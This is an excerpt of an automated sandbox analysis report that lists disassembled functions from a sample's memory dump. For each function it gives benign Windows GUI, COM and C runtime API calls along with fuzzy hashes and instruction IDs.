                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: f04affe610919feb2a1fc0063f14890986e31995c82a903dcce4b52ecb4a3119
                                                                  • Instruction ID: ffa05ae792cc37fd1f496259efd8e88eebfe192ab2813fdb27f5def0f0e381ec
                                                                  • Opcode Fuzzy Hash: f04affe610919feb2a1fc0063f14890986e31995c82a903dcce4b52ecb4a3119
                                                                  • Instruction Fuzzy Hash: 9921267221C204AFE7209F31ED99B263B6DFB4475AF051028F809911B1CBB5AD94F771
                                                                  Function 0095D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • CoInitialize.OLE32(00000000), ref: 0095D5EA
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0095D67D
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 0095D691
                                                                  • CoCreateInstance.OLE32(00982D7C,00000000,00000001,009A8C1C,?), ref: 0095D6DD
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0095D74C
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 0095D7A4
                                                                  • _memset.LIBCMT ref: 0095D7E1
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0095D81D
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0095D840
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0095D847
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0095D87E
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 0095D880
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: 6115e488838c6e089d5f203391bad414b5df3b00a9a749a4a3686b13c90b04c1
                                                                  • Instruction ID: bd87f321b4dfb1ae337c7208ada5af78f207e7c270c4d53d6be6fdb2345bcbab
                                                                  • Opcode Fuzzy Hash: 6115e488838c6e089d5f203391bad414b5df3b00a9a749a4a3686b13c90b04c1
                                                                  • Instruction Fuzzy Hash: 86B12E75A00109AFDB14DFA5C888EAEBBB9FF48315F008469F909EB261DB30ED45CB51
                                                                  Function 0094C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 0094C283
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0094C295
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0094C2F3
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0094C2FE
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0094C310
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0094C364
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0094C372
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0094C383
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0094C3C6
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0094C3D4
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0094C3F1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0094C3FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 43975f89d67909ac585fd67943c29343ef852abe9efae3b831b2ef6f84e0a4b2
                                                                  • Instruction ID: dbb1a61df98a572c20c9d828154ba25cce6e5d61e7ebf76360fdbe4597b492e4
                                                                  • Opcode Fuzzy Hash: 43975f89d67909ac585fd67943c29343ef852abe9efae3b831b2ef6f84e0a4b2
                                                                  • Instruction Fuzzy Hash: A35101B1B10205AFDB18CFA9DD99E6DBBB9FB88711F14812DF519E7290D7709D408B10
                                                                  Function 008F201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F2036,?,00000000,?,?,?,?,008F16CB,00000000,?), ref: 008F1B9A
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008F20D3
                                                                  • KillTimer.USER32(-00000001,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 008F216E
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0092BCA6
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BCD7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BCEE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BD0A
                                                                  • DeleteObject.GDI32(00000000), ref: 0092BD1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: 9309e9eabd9852dd386930fa3b12f75c6fa7819a074e9c50bd693e1ad1d87dc2
                                                                  • Instruction ID: c3481355c01478b37d2e46ed19215ad74201b68134628e9471f46dde16554905
                                                                  • Opcode Fuzzy Hash: 9309e9eabd9852dd386930fa3b12f75c6fa7819a074e9c50bd693e1ad1d87dc2
                                                                  • Instruction Fuzzy Hash: F761AF32124A18DFCB359F28DA58B3977F1FF84326F104529E246D66B4CB70A890EF40
                                                                  Function 008F21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
                                                                  • GetSysColor.USER32(0000000F), ref: 008F21D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 22b5e8a4ce93ae053c7c4ece30ca8f0934c830b5685a86c40be4ce115d94ac11
                                                                  • Instruction ID: 86043cbac75f52ff8d1a2c5ca4c58559c94c89fb0f2e35000d275c55338f02d4
                                                                  • Opcode Fuzzy Hash: 22b5e8a4ce93ae053c7c4ece30ca8f0934c830b5685a86c40be4ce115d94ac11
                                                                  • Instruction Fuzzy Hash: CE41B232108158DBDB215F38EC98BB97BA5FB06331F244265FE65DA1E5C7318C81DB61
                                                                  Function 0095A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,0097F910), ref: 0095A90B
                                                                  • GetDriveTypeW.KERNEL32(00000061,009A89A0,00000061), ref: 0095A9D5
                                                                  • _wcscpy.LIBCMT ref: 0095A9FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 939743af8f37a3a489d948371f8b28471e3e8b86777936aef80bce33bc9176d9
                                                                  • Instruction ID: 568d7b0dd216672f1b560f10df52c114640534f9618ddf80c95bc597bfe12ee5
                                                                  • Opcode Fuzzy Hash: 939743af8f37a3a489d948371f8b28471e3e8b86777936aef80bce33bc9176d9
                                                                  • Instruction Fuzzy Hash: 1A51BA312083059BC310EF25C8A2AAFB7A9FFC5301F10492DF995972A2DB719949CB93
                                                                  Function 008F9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __i64tow__itow__swprintf
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 421087845-2263619337
                                                                  • Opcode ID: aa64c7429ae427118b7fada553b554514566a7cc9f070ce7afe32bc7a43d6760
                                                                  • Instruction ID: 4a1e8ff78c109ea0251875e40ac95cc03e3a4d218429d82c7e98e91d0b68506f
                                                                  • Opcode Fuzzy Hash: aa64c7429ae427118b7fada553b554514566a7cc9f070ce7afe32bc7a43d6760
                                                                  • Instruction Fuzzy Hash: 2D41C67161020D9EDB24EF78E852F7677F8FF86304F20447EF589DA295EA7199418710
                                                                  Function 00977152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0097716A
                                                                  • CreateMenu.USER32 ref: 00977185
                                                                  • SetMenu.USER32(?,00000000), ref: 00977194
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00977221
                                                                  • IsMenu.USER32(?), ref: 00977237
                                                                  • CreatePopupMenu.USER32 ref: 00977241
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0097726E
                                                                  • DrawMenuBar.USER32 ref: 00977276
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                  • String ID: 0$F
                                                                  • API String ID: 176399719-3044882817
                                                                  • Opcode ID: 0db0d9fa28981407032cff573bb5c93a97f95dffc4d97c4b0aa22293b5d960d4
                                                                  • Instruction ID: 6b15b1233714ddfeacebf689674b6e561031fe2a1595d7dc1b4cc48a46c9fc37
                                                                  • Opcode Fuzzy Hash: 0db0d9fa28981407032cff573bb5c93a97f95dffc4d97c4b0aa22293b5d960d4
                                                                  • Instruction Fuzzy Hash: A6416B76A15205EFDB10DFA4D984FAABBB9FF48310F144028F929A7361D731A910DF94
                                                                  Function 009774BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0097755E
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00977565
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00977578
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00977580
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0097758B
                                                                  • DeleteDC.GDI32(00000000), ref: 00977594
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0097759E
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009775B2
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009775BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: c526c129e3d25252d2d608e44078178482d70c7271460e2e6c4a929c13d13f24
                                                                  • Instruction ID: 0bf4a6e050b5400eae6cbea3c28029d496f440b22c4e18f5bdea85d01490e537
                                                                  • Opcode Fuzzy Hash: c526c129e3d25252d2d608e44078178482d70c7271460e2e6c4a929c13d13f24
                                                                  • Instruction Fuzzy Hash: 1D316B73118219BBDF119FA4DC08FEA7B69FF09724F114224FA19A61A0D731D861EBA4
                                                                  Function 00916E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00916E3E
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  • __gmtime64_s.LIBCMT ref: 00916ED7
                                                                  • __gmtime64_s.LIBCMT ref: 00916F0D
                                                                  • __gmtime64_s.LIBCMT ref: 00916F2A
                                                                  • __allrem.LIBCMT ref: 00916F80
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00916F9C
                                                                  • __allrem.LIBCMT ref: 00916FB3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00916FD1
                                                                  • __allrem.LIBCMT ref: 00916FE8
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00917006
                                                                  • __invoke_watson.LIBCMT ref: 00917077
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                  • Instruction ID: 80dc589da4890f46286240099c9ab3a8c5993a4339b23b04dc8c3ec3dcbc2b1a
                                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                  • Instruction Fuzzy Hash: 0B71E576F00B1BABD714AE68DC41BDAB7B8AF44320F148629F514E62C1E770E9908B90
                                                                  Function 00952527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952542
                                                                  • GetMenuItemInfoW.USER32(009B5890,000000FF,00000000,00000030), ref: 009525A3
                                                                  • SetMenuItemInfoW.USER32(009B5890,00000004,00000000,00000030), ref: 009525D9
                                                                  • Sleep.KERNEL32(000001F4), ref: 009525EB
                                                                  • GetMenuItemCount.USER32(?), ref: 0095262F
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0095264B
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00952675
                                                                  • GetMenuItemID.USER32(?,?), ref: 009526BA
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00952700
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00952714
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00952735
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 0e08a5b8d88c4968aadba4230f90276164ed4ac02a9cd5ec5c3fc71f6e8d96c7
                                                                  • Instruction ID: ec33d693b3fd1332fe2dd0b3357475a26f819a442f8f5b7256af7f83999d1993
                                                                  • Opcode Fuzzy Hash: 0e08a5b8d88c4968aadba4230f90276164ed4ac02a9cd5ec5c3fc71f6e8d96c7
                                                                  • Instruction Fuzzy Hash: B061BB70915249AFDF11CF65CC88ABE7BB8FB46306F14056AFC41A3290D731AD49DB20
                                                                  Function 00976F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00976FA5
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00976FA8
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00976FCC
                                                                  • _memset.LIBCMT ref: 00976FDD
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00976FEF
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00977067
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 4e4a40091782cf6976850de78204c9b3be8aacc8f048bc8ce6bd72868b30b67b
                                                                  • Instruction ID: 68dee889621826e789cbe28dc1abf56e752504733d4145b77af502184d40666b
                                                                  • Opcode Fuzzy Hash: 4e4a40091782cf6976850de78204c9b3be8aacc8f048bc8ce6bd72868b30b67b
                                                                  • Instruction Fuzzy Hash: 0B616E76A04208AFDB11DFA4CD81FEEB7F8EB49710F144159FA18AB2A1C771AD41DB50
                                                                  Function 00946B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00946BBF
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00946C18
                                                                  • VariantInit.OLEAUT32(?), ref: 00946C2A
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00946C4A
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00946C9D
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00946CB1
                                                                  • VariantClear.OLEAUT32(?), ref: 00946CC6
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00946CD3
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00946CDC
                                                                  • VariantClear.OLEAUT32(?), ref: 00946CEE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00946CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 9d18c5d4979acaedd7d5dd9676f991405ba3acd915249bb9b56cd3b5a4e71f62
                                                                  • Instruction ID: 43cb65820f686d7036938256e77348f9a5495c7a3693c7d6465390abf93c1d31
                                                                  • Opcode Fuzzy Hash: 9d18c5d4979acaedd7d5dd9676f991405ba3acd915249bb9b56cd3b5a4e71f62
                                                                  • Instruction Fuzzy Hash: DD419271A041199FCF04DFA8D898EAEBBB9FF48350F008079E955E7261CB30A945CFA1
                                                                  Function 009683BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • CoInitialize.OLE32 ref: 00968403
                                                                  • CoUninitialize.OLE32 ref: 0096840E
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00982BEC,?), ref: 0096846E
                                                                  • IIDFromString.OLE32(?,?), ref: 009684E1
                                                                  • VariantInit.OLEAUT32(?), ref: 0096857B
                                                                  • VariantClear.OLEAUT32(?), ref: 009685DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
